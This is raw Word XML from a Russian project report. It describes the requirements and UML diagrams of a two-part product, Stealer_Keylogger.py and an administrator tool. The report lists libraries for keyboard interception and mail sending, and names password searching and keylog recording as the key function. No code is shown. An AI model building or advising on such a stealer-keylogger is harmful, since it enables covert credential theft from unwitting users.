    <w:p w14:paraId="036DDA40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системе управления базами данных (СУБД):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285A7D8D" w14:textId="77777777" w:rsidR="00DA15FE" w:rsidRPr="00AA00F9" w:rsidRDefault="00DA15FE" w:rsidP="00A80C30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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ostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="328F5BD2" w14:textId="77777777" w:rsidR="00DA15FE" w:rsidRPr="00AA00F9" w:rsidRDefault="00DA15FE" w:rsidP="00347D26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2410"/>
        </w:tabs>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve">Версия 15.5 и выше. Программа предполагает использование СУБД </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> для хранения и обработки данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C259B6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окружению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7AF86D76" w14:textId="77777777" w:rsidR="00DA15FE" w:rsidRPr="00AA00F9" w:rsidRDefault="00DA15FE" w:rsidP="00A80C30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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 xml:space="preserve"> 3.9+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278C399C" w14:textId="77777777" w:rsidR="00DA15FE" w:rsidRPr="00AA00F9" w:rsidRDefault="00DA15FE" w:rsidP="00347D26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12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разработана с использованием </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t>Python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> 3.9 и требует наличия </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t>Python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> 3.9 и выше для корректной работы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498AE552" w14:textId="06A21474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наличию библиотек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11DBAB6A" w14:textId="73F02D28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os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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t>Python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> для взаимодействия с операционной системой. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334BC073" w14:textId="6001570F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smt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отправки электронной почты через протокол SMTP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C22C56E" w14:textId="2E75BA49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hash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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t>хэширования</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> данных. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFCFC01" w14:textId="75784235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time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временем. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705C93B1" w14:textId="2190D43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lastRenderedPageBreak/>
        <w:t>keyboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> Библиотека для перехвата и обработки событий клавиатуры в реальном времени. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9AEBA2" w14:textId="4C2AA15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kivy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> Фреймворк для разработки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t>многоплатформенных</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> мобильных приложений с использованием языка программирования </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t>Python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144E62EC" w14:textId="1A7C728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r w:rsidRPr="00AA00F9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>bs4 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>BeautifulSoup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> Библиотека для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t>парсинга</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> HTML и XML документов. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E35ACA3" w14:textId="334187E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ima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взаимодействия с почтовыми серверами по протоколу IMAP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2CA5D6" w14:textId="7408200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email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электронной почтой. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E2B432" w14:textId="76C1AEB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2835"/>
        </w:tabs>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA00F9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>psycopg2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> Библиотека для работы с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> базами данных. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F749E3" w14:textId="7F57A9C4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851"/>
          <w:tab w:val="num" w:pos="1276"/>
        </w:tabs>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>kivy.uix.scrollview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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gridlayout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popup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clock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> Дополнительные элементы и функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t>Kivy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve">, используемые для создания пользовательского интерфейса и организации работы приложения. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07571E9A" w14:textId="04C8357B" w:rsidR="00DA15FE" w:rsidRDefault="00DA15FE" w:rsidP="00DA15FE">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA00F9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Инструменты для работы с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB86DBA" w14:textId="73F30CB1" w:rsidR="005728A2" w:rsidRPr="005728A2" w:rsidRDefault="005728A2" w:rsidP="00DA15FE">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Дополнительные требования</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343DAC86" w14:textId="77777777" w:rsidR="00DA15FE" w:rsidRPr="00AA00F9" w:rsidRDefault="00DA15FE" w:rsidP="00CC51D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA00F9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Pgadmin4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D105B75" w14:textId="77777777" w:rsidR="00DA15FE" w:rsidRPr="00AA00F9" w:rsidRDefault="00DA15FE" w:rsidP="00DA15FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve">Для первичного создания и настройки базы данных </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t>, которая предназначена для хранения данных, пересылаемых и обрабатываемых основным программным комплексом продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAF03D9" w14:textId="5BBC6CB7" w:rsidR="005A269C" w:rsidRDefault="001A195A" w:rsidP="001A195A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc155993242"/>
      <w:bookmarkStart w:id="19" w:name="_Toc155993724"/>
      <w:r>
        <w:t>2.3 Архитектурные диаграммы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="359E21A7" w14:textId="0E0E70E0" w:rsidR="00E230A9" w:rsidRDefault="00F85FCE" w:rsidP="00E230A9">
      <w:r>
        <w:t>Во время выполнения проекта</w:t>
      </w:r>
      <w:r w:rsidR="00FC1C35">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00352BCD">
        <w:t xml:space="preserve"> членом команды, занимающим должность проектировщика,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> были реализованы архитектурные диаграммы </w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB">
        <w:t>продукта</w:t>
      </w:r>
      <w:r w:rsidR="00722BAA">
        <w:t xml:space="preserve"> и концептуальная модель БД</w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB">
        <w:t>. В частности</w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB" w:rsidRPr="00352BCD">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB">
        <w:t xml:space="preserve"> были реализованы следующие диаграммы</w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB" w:rsidRPr="00352BCD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678FB31D" w14:textId="481A5791" w:rsidR="003D5EDB" w:rsidRDefault="003D5EDB" w:rsidP="005D18E2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="284"/>
      </w:pPr>
      <w:r>
        <w:t>Архитектурная диаграмма продукта</w:t>
      </w:r>
      <w:r w:rsidR="00073ECB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5F04B2" w14:textId="2AA9944F" w:rsidR="00E230A9" w:rsidRDefault="003D5EDB" w:rsidP="005D18E2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="284"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Функциональная диаграмма </w:t>
      </w:r>
      <w:r w:rsidRPr="00E230A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UM</w:t>
      </w:r>
      <w:r w:rsidR="002E5EF4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00E230A9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B047A7" w14:textId="5D8E6EC3" w:rsidR="00E230A9" w:rsidRDefault="00E230A9" w:rsidP="00E230A9">
      <w:r>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB">
        <w:t xml:space="preserve"> виду не наличия в нотации </w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB" w:rsidRPr="003D5EDB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB">
        <w:t xml:space="preserve">такой диаграммы, как «Функциональная диаграмма </w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB" w:rsidRPr="003D5EDB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB">
        <w:t xml:space="preserve">были выбраны и реализованы следующие диаграммы </w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidR="003D5EDB" w:rsidRPr="003D5EDB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BB8638" w14:textId="45F23D4F" w:rsidR="00E230A9" w:rsidRDefault="003D5EDB" w:rsidP="00371D94">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="284"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Диаграмма прецедентов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1DDD27E8" w14:textId="0F2051FD" w:rsidR="003D5EDB" w:rsidRPr="005C79E4" w:rsidRDefault="003D5EDB" w:rsidP="00371D94">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="284"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Диаграмма состояний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65DF5C11" w14:textId="05BE16D5" w:rsidR="00D524BE" w:rsidRPr="00D524BE" w:rsidRDefault="003D5EDB" w:rsidP="00371D94">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="284"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Диаграмма последовательности </w:t>
      </w:r>
      <w:r w:rsidRPr="00E230A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidR="008B5B04">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="_СПИСОК_ИСПОЛЬЗОВАННОЙ_ЛИТЕРАТУРЫ" w:history="1">
        <w:r w:rsidR="008B5B04" w:rsidRPr="008B5B04">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>[4]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D524BE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBEA871" w14:textId="4BA1AFE4" w:rsidR="003D5EDB" w:rsidRDefault="003D5EDB" w:rsidP="003D5EDB">
      <w:r>
        <w:t>Также была реализована концептуальная модель БД.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E58BD5" w14:textId="7F669026" w:rsidR="00167575" w:rsidRDefault="00167575" w:rsidP="003D5EDB">
      <w:r>
        <w:t>Ниже будут приведены все выполненные диаграммы</w:t>
      </w:r>
      <w:r w:rsidR="00B10896">
        <w:t xml:space="preserve">, а также все диаграммы приложены в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B10896">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B10896" w:rsidRPr="00B10896">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00B10896">
        <w:t>репозитории.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4D2AB6" w14:textId="048A8292" w:rsidR="004B1E87" w:rsidRDefault="004B1E87" w:rsidP="004B1E87">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc155993243"/>
      <w:bookmarkStart w:id="21" w:name="_Toc155993725"/>
      <w:r>
        <w:t>2.3.1 Архитектурная диаграмма продукта</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="50BFC705" w14:textId="7977686C" w:rsidR="004B1E87" w:rsidRPr="004B1E87" w:rsidRDefault="004B1E87" w:rsidP="004B1E87">
      <w:r>
        <w:t>На рисунке 2 изображена архитектурная диаграмма продукта. За основу взята многоуровневая архитектура.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5DF1F3" w14:textId="440C555A" w:rsidR="001A195A" w:rsidRDefault="004B1E87" w:rsidP="004B1E8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334001" wp14:editId="081BD552">
            <wp:extent cx="5939790" cy="288861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6E1" w14:textId="56E7F234" w:rsidR="004B1E87" w:rsidRDefault="004B1E87" w:rsidP="004B1E87">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 2 – Архитектурная диаграмма продукта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B43A24A" w14:textId="06EC1922" w:rsidR="004B1E87" w:rsidRDefault="00167575" w:rsidP="002D27A9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc155993244"/>
      <w:bookmarkStart w:id="23" w:name="_Toc155993726"/>
      <w:r>
        <w:t xml:space="preserve">2.3.2 </w:t>
      </w:r>
      <w:r w:rsidR="002D27A9">
        <w:t xml:space="preserve">Функциональные диаграммы </w:t>
      </w:r>
      <w:r w:rsidR="002D27A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidR="002D27A9" w:rsidRPr="002D27A9">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="002D27A9">
        <w:t xml:space="preserve">диаграмма прецедентов </w:t>
      </w:r>
      <w:r w:rsidR="002D27A9" w:rsidRPr="00E230A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidR="002D27A9">
        <w:t xml:space="preserve">, диаграмма состояний </w:t>
      </w:r>
      <w:r w:rsidR="002D27A9" w:rsidRPr="00E230A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidR="002D27A9">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="2A8CD464" w14:textId="6C36EEBE" w:rsidR="002D27A9" w:rsidRDefault="003528E7" w:rsidP="002D27A9">
      <w:r>
        <w:t>В виду наличия в продукте двух связанных программа диаграмма прецедентов и диаграмма состояний была реализована отдельно для каждой из программ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1271CE43" w14:textId="14D8491C" w:rsidR="003528E7" w:rsidRPr="008F1CD3" w:rsidRDefault="003528E7" w:rsidP="002D27A9">
      <w:r>
        <w:t>На рисунке</w:t>
      </w:r>
      <w:r w:rsidR="005D1538">
        <w:t xml:space="preserve"> 3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="008F1CD3" w:rsidRPr="008F1CD3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCE4B6C" w14:textId="38783C81" w:rsidR="005D1538" w:rsidRDefault="00D66CB7" w:rsidP="005D15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5FFDF" wp14:editId="5BE4DE27">
            <wp:extent cx="5939790" cy="33083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945" w14:textId="0D9918AF" w:rsidR="005D1538" w:rsidRDefault="005D1538" w:rsidP="002726EB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 3 –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>программы</w:t>
      </w:r>
      <w:r w:rsidR="00573C63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003528E7">
        <w:t>Stealer_Keylogger.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030F8809" w14:textId="069692B7" w:rsidR="008F1CD3" w:rsidRPr="008F1CD3" w:rsidRDefault="008F1CD3" w:rsidP="008F1CD3">
      <w:r>
        <w:t xml:space="preserve">На рисунке </w:t>
      </w:r>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>4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125BA494" w14:textId="0AA95FCD" w:rsidR="005D1538" w:rsidRDefault="00D66CB7" w:rsidP="00303942">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ECCF2D9" wp14:editId="3252E746">
            <wp:extent cx="5939790" cy="340169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4A46" w14:textId="3CD091F5" w:rsidR="00303942" w:rsidRDefault="00303942" w:rsidP="00303942">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 4 -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303942">
        <w:t>Administrator_Interface_Tools.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CCAACA" w14:textId="1843DC37" w:rsidR="009526D8" w:rsidRDefault="009526D8" w:rsidP="009526D8">
      <w:r>
        <w:t xml:space="preserve">На рисунке 5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Pr="008F1CD3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E63E53F" w14:textId="3504DA0D" w:rsidR="009526D8" w:rsidRDefault="009526D8" w:rsidP="009526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619D7" wp14:editId="717B284C">
            <wp:extent cx="5939790" cy="4015105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02" w14:textId="72F282F0" w:rsidR="009526D8" w:rsidRDefault="009526D8" w:rsidP="009526D8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 5 - </w:t>
      </w:r>
      <w:r w:rsidR="00573C63">
        <w:t xml:space="preserve">Диаграмма состояний </w:t>
      </w:r>
      <w:r w:rsidR="00573C63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:r w:rsidR="00573C63" w:rsidRPr="005D1538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00573C63">
        <w:t xml:space="preserve">программы </w:t>
      </w:r>
      <w:r w:rsidR="00573C63" w:rsidRPr="003528E7">
        <w:t>Stealer_Keylogger.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A88D00" w14:textId="31291CE8" w:rsidR="00573C63" w:rsidRDefault="00573C63" w:rsidP="00573C63">
      <w:r>
        <w:t xml:space="preserve">На рисунке 6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5927CA34" w14:textId="77777777" w:rsidR="00960B00" w:rsidRDefault="00960B00" w:rsidP="00960B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2729AE" wp14:editId="0976DEB7">
            <wp:extent cx="5939790" cy="4735830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0F02" w14:textId="77777777" w:rsidR="00960B00" w:rsidRDefault="00960B00" w:rsidP="00960B00">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 6 - Диаграмма состояний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8F1CD3">
        <w:t>Administrator_Interface_Tools.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1146CFF8" w14:textId="304AD88A" w:rsidR="00960B00" w:rsidRDefault="00960B00" w:rsidP="00960B00">
      <w:r>
        <w:t>В виду размером получившихся диаграмм их невозможно подробно рассмотреть на скриншотах</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB48D3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>поэтому рекомендуется просматривать их в репозитории.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BAAB1F" w14:textId="53F67C69" w:rsidR="00D02CA7" w:rsidRPr="009C2938" w:rsidRDefault="00D02CA7" w:rsidP="00D02CA7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc155993245"/>
      <w:bookmarkStart w:id="25" w:name="_Toc155993727"/>
      <w:r>
        <w:t xml:space="preserve">2.3.3 Диаграмма последовательности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="320FADE6" w14:textId="70BC1DF9" w:rsidR="00D02CA7" w:rsidRDefault="00960B00" w:rsidP="00573C63">
      <w:r>
        <w:t xml:space="preserve">Диаграмма последовательности была реализована для ключевой функции продукта, содержащейся в программе </w:t>
      </w:r>
      <w:r w:rsidRPr="00960B00">
        <w:t>Stealer_Keylogger.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – функция поиска паролей и записи </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>кейлогов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD6BFCE" w14:textId="6B053B25" w:rsidR="00960B00" w:rsidRDefault="00960B00" w:rsidP="00573C63">
      <w:r>
        <w:t xml:space="preserve">На рисунке 7 изображена первая часть диаграммы последовательности (реализована для функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00005435" w:rsidRPr="00005435">
        <w:t>process_files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00005435" w:rsidRPr="00005435">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00005435">
        <w:t xml:space="preserve">программы </w:t>
      </w:r>
      <w:r w:rsidR="00005435" w:rsidRPr="00960B00">
        <w:t>Stealer_Keylogger.py</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00005435">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BAE3CA" w14:textId="57196F01" w:rsidR="00005435" w:rsidRDefault="00005435" w:rsidP="00005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68EDC" wp14:editId="5AEDB363">
            <wp:extent cx="5939790" cy="6189345"/>
